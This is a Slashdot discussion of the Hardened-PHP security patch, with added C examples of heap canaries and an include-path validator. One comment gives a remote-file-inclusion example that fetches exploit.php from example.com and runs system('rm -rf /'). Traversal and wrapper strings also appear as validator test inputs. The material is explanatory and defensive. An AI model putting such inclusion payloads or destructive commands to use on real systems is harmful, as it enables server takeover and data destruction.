Slashdot Mirror


Hardened PHP

Frank Kreuzbach writes "Yesterday the Hardened-PHP Project has announced its existence on the PHP-general mailing list. It is the first public patch for PHP which adds security hardening features. It is meant as a proactive approach to protect servers against known and unknown weaknesses within PHP scripts or the engine itself. It enforces restrictions on include statements, adds canary protection to allocated memory and other internal structures and protects against internal format string vulnerabilities. It has syslog support and logs every attack together with the originating IP."

10 of 187 comments

  1. Re:Phew! by CTho9305 · Score: 5, Informative

    It's a way to protect against buffer overflows. You put some known data on the stack, and before returning from each function call, make sure that data hasn't been changed. Most buffer overflow exploits work by overwriting part of the stack, and canary protection will detect that the stack has been changed, so the exploit code will not run.
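The same idea applied to heap allocations, which is what the story summary means by "canary protection to allocated memory": an added example in C, not code from Hardened-PHP or from the commenter. It places a guard pattern before and after every allocation and verifies both guards at free time; the pattern bytes and the `guarded_*` function names are constructed for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Width of the guard region placed before and after every allocation. */
#define CANARY_LEN 8

/* Guard pattern (constructed for this example; a real implementation would
 * pick a random per-process value so an attacker cannot simply rewrite it). */
static const unsigned char CANARY[CANARY_LEN] = {
    0xDE, 0xAD, 0xBE, 0xEF, 0x5A, 0xA5, 0x0F, 0xF0
};

/* Allocate `size` usable bytes surrounded by two canaries.
 * Layout: [canary][size bytes][canary]; the caller gets a pointer to the middle. */
void *guarded_alloc(size_t size)
{
    unsigned char *base = malloc(size + 2 * CANARY_LEN);
    if (base == NULL)
        return NULL;
    memcpy(base, CANARY, CANARY_LEN);                     /* leading guard  */
    memcpy(base + CANARY_LEN + size, CANARY, CANARY_LEN); /* trailing guard */
    return base + CANARY_LEN;
}

/* Return 1 if both canaries around `p` (allocated for `size` bytes) are intact,
 * 0 if either has been overwritten. */
int guarded_check(const void *p, size_t size)
{
    const unsigned char *user = p;
    int before_ok = memcmp(user - CANARY_LEN, CANARY, CANARY_LEN) == 0;
    int after_ok  = memcmp(user + size, CANARY, CANARY_LEN) == 0;
    return before_ok && after_ok;
}

/* Release a guarded block; returns the check result so the caller can log it
 * (Hardened-PHP logs such events via syslog; here we just return the verdict). */
int guarded_free(void *p, size_t size)
{
    int intact = guarded_check(p, size);
    free((unsigned char *)p - CANARY_LEN);
    return intact;
}

/* Copy the C string `src` (including its NUL) into a guarded buffer of `size`
 * bytes without any bounds check, mimicking an unbounded strcpy, then report
 * whether the trailing canary survived.  Returns 1 if intact, 0 if an overflow
 * was detected, -1 on allocation failure.  For this demo the copied strings are
 * never longer than size + CANARY_LEN, so the writes stay inside the malloc'd
 * region and the behaviour is well defined. */
int demo_copy(const char *src, size_t size)
{
    char *buf = guarded_alloc(size);
    if (buf == NULL)
        return -1;
    memcpy(buf, src, strlen(src) + 1);
    return guarded_free(buf, size);
}

int main(void)
{
    printf("short input -> %s\n",
           demo_copy("hello", 16) ? "canary intact" : "OVERFLOW DETECTED");
    printf("long input  -> %s\n",
           demo_copy("hello, overflowing", 16) ? "canary intact" : "OVERFLOW DETECTED");
    return 0;
}
```

The detection happens only when the block is checked (here at free time), so an overwrite that is exploited before the next check is not stopped; that is why such schemes are combined with a secret, per-process canary value and checks at every engine-level boundary rather than relying on a fixed pattern.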

  2. Other PHP Hardening Sites by Dozix007 · Score: 5, Informative

    I run http://www.uberhacker.com . This site is dedicated to secure PHP programming. It is better to program secure rather than limit coding abilities. Secure programming allows for a wider range of scripts and security.

  3. Re:Already in use by abulafia · Score: 4, Informative

    Weird. I do high-volume sites for a living, and mod_perl rocks. I sometimes fall back to coding something in C when it is called millions of times a day, but in general, mod_perl makes getting close to the iron really easy.

    shrugs.

    Hell, people probably can write fast software in PHP... I can't stand the language, myself, so I've never bothered to learn optimization tricks. Mod_perl kicks ass... as Slashdot knows, not to mention Amazon...

    Can a PHP devotee who also knows web development from a mod_perl standpoint explain why you like PHP so much? I'm honestly curious. I've modified other people's apps, and find the language both cumbersome to use for non-trivial things and overly low level, at the same time.

    --
    I forget what 8 was for.
  4. Not likely to get many replies by Anonymous Coward · Score: 3, Informative

    Not many folks will qualify as knowing both. From my perspective, PHP was stable (MOD_PERL, several years back, was twitchy) and considerably simpler. Remember that to much of the programming world, Perl is weird.

  5. Re:Not quite by vlad_petric · Score: 4, Informative

    Java Server Pages - jsp.

    Its advantages: faster (java isn't slow, it has a slow startup, which for a server is hardly a big deal), because the code you write is going to be converted in machine code; scales better (PHP still doesn't provide connection pooling; pconnect doesn't count, btw); more secure (no buffer overflow b/c of java, can use security policies to restrict what your pages are doing)

    Its disadvantage: well, you have to learn java. You can't just jump into writing jsp pages, as you'd do with php. But I can equally argue that that's an advantage as well, as it increases the quality of code.

    --

    The Raven

  6. Re:Already in use by nemesisj · Score: 4, Informative

    I'm not extremely familiar with mod_perl, but I do lots of work in PHP.

    The reason I like PHP better than perl for web development is the fact that you can escape in and out of execution (yes, this can be and is often abused) and I like how PHP wraps some of the more unreadable aspects of perl (like extracting arguments, etc) and has nice session support.

    Also, PHP seems to have a lot of standard web stuff rolled in by default. I know that you can configure perl to be whatever you want it to be, but back before I had access to my own servers whose environment I could control, this mattered a bit more.

    Anyway, just my two cents - it really comes down to personal preference between the two in my opinion - lots of the major distinctions have gone away in the last couple of years.

  7. Re:Already in use by BusDriver · Score: 4, Informative

    Turck MMCache dev stopped since the lead dev was taken in by Zend. That doesn't mean development has stopped though! New people have taken it over and are slowly coding new stuff up!

  8. There are many better alternatives to PHP by voodoo1man · Score: 2, Informative

    A mini-language designed for one purpose will eventually become a general-purpose language (as PHP already has), and it doesn't mean it is well-designed in the first place (as my superficial familiarity with PHP tells me). That being said, there are many alternatives to PHP that work quite well.

    The ones I'm most familiar with are extensions of Common Lisp. There are 3 CL web servers, each with dynamic HTML generation capability (AllegroServe, Araneida, CL-HTTP). Then there's Lisp Server Pages, Active Lisp Pages, etc., and another whole load of CGI solutions. I use (and highly recommend) AllegroServe. There is a whole big list over at Cliki (which runs on Araneida).

    There are many CGI bindings for various Scheme implementations, and the PLT web server is kind of popular. I'm not very familiar with Scheme web solutions though, so I probably left something out.

    There is a lot of activity with Smalltalk-based web apps. Seaside is a continuation-based framework that gets a lot of attention. There's also AIDA/Web, and an unfinished mod.Smalltalk. I am not very familiar with Smalltalk web solutions either, so I probably missed a few.

    Python is a very popular option, and Zope seems to be a very popular framework. I don't know anything about web programming in Python aside from that.

    Take pretty much any of the recent lightweight (in the conference meaning of the term) languages, and you're bound to find good options, almost all of them better in terms of security and speed than PHP; I can't think of a single one that has a more annoying syntax or more convoluted and limited semantics than PHP, though. Another thing that you should consider is the website we're posting on is pretty interactive, and kind of popular, and it's written in Perl.

    --

    In the great CONS chain of life, you can either be the CAR or be in the CDR.

  9. Re:Really Now.. by Anonymous Coward · Score: 2, Informative

    No, it's far worse than just reading "/etc/passwd", you could say "action=http://example.com/exploit.php", and PHP will happily (yet stupidly) execute the contents of "exploit.php", whatever that might be (say, "system('rm -rf /');" perhaps?).

    Because PHP was written with security as a distant afterthought.
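The remote-include problem in the comment above is what the story summary's "restrictions on include statements" is aimed at. The following is an added example in C (the language the PHP engine is written in), not code from Hardened-PHP or from the commenter, of the kind of engine-side check that would refuse such a target: it rejects anything with a stream wrapper or URL scheme (`http://`, `php://`, `data:`), any `..` path component, and any absolute path outside a configured include root. The root directory `/var/www/app/includes/`, the `check_include` name and the `INCLUDE_*` reason codes are assumptions for this example.

```c
#include <stdio.h>
#include <string.h>

/* Directory that include targets must resolve under (assumed for this example). */
#define INCLUDE_ROOT "/var/www/app/includes/"

/* Reason codes returned by check_include(); 0 means the target is acceptable. */
enum {
    INCLUDE_OK = 0,
    INCLUDE_EMPTY,        /* no target given                           */
    INCLUDE_REMOTE,       /* contains ':' -> URL or stream wrapper     */
    INCLUDE_TRAVERSAL,    /* a ".." path component                     */
    INCLUDE_OUTSIDE_ROOT, /* absolute path not under INCLUDE_ROOT      */
    INCLUDE_TOO_LONG      /* resolved path does not fit the buffer     */
};

/* Return 1 if any '/'-separated component of `path` is exactly "..". */
static int has_dotdot(const char *path)
{
    const char *p = path;
    while (*p) {
        const char *seg = p;
        while (*p && *p != '/')
            p++;
        if (p - seg == 2 && seg[0] == '.' && seg[1] == '.')
            return 1;
        if (*p == '/')
            p++;
    }
    return 0;
}

/* Validate an include target taken from untrusted input.  On success the
 * path to open is written to `resolved`.  Relative targets are anchored under
 * INCLUDE_ROOT; absolute targets must already start with it. */
int check_include(const char *target, char *resolved, size_t resolved_len)
{
    int n;

    if (target == NULL || *target == '\0')
        return INCLUDE_EMPTY;
    /* Any ':' is refused outright: "http://", "ftp://", "php://input",
     * "data:" and "phar://" all need one, so this blocks every wrapper. */
    if (strchr(target, ':') != NULL)
        return INCLUDE_REMOTE;
    if (has_dotdot(target))
        return INCLUDE_TRAVERSAL;

    if (target[0] == '/') {
        if (strncmp(target, INCLUDE_ROOT, strlen(INCLUDE_ROOT)) != 0)
            return INCLUDE_OUTSIDE_ROOT;
        n = snprintf(resolved, resolved_len, "%s", target);
    } else {
        n = snprintf(resolved, resolved_len, "%s%s", INCLUDE_ROOT, target);
    }
    if (n < 0 || (size_t)n >= resolved_len)
        return INCLUDE_TOO_LONG;
    return INCLUDE_OK;
}

/* Human-readable reason, suitable for the kind of log line the summary describes. */
const char *include_reason(int code)
{
    switch (code) {
    case INCLUDE_OK:           return "ok";
    case INCLUDE_EMPTY:        return "empty include target";
    case INCLUDE_REMOTE:       return "remote or wrapper include refused";
    case INCLUDE_TRAVERSAL:    return "directory traversal refused";
    case INCLUDE_OUTSIDE_ROOT: return "path outside include root refused";
    case INCLUDE_TOO_LONG:     return "path too long";
    default:                   return "unknown";
    }
}

int main(void)
{
    /* Constructed sample targets, including the one from the comment above. */
    const char *samples[] = {
        "footer.php",
        "http://example.com/exploit.php",
        "../../etc/passwd",
        "/etc/passwd",
        "php://input",
    };
    char resolved[256];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int rc = check_include(samples[i], resolved, sizeof resolved);
        printf("%-32s -> %s%s%s\n", samples[i], include_reason(rc),
               rc == INCLUDE_OK ? " : " : "", rc == INCLUDE_OK ? resolved : "");
    }
    return 0;
}
```

This is a purely lexical check; a production version would additionally canonicalise the resolved path with `realpath()` and re-verify the root prefix, because a symlink inside the include directory can still point outside it.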

  10. Re:Already in use by BusDriver · Score: 2, Informative

    There is a 2.4.7-dev version from CVS that works quite well with PHP5!

    I don't think its future is in doubt at all, just that the insane pace it was developed at has slowed a little bit.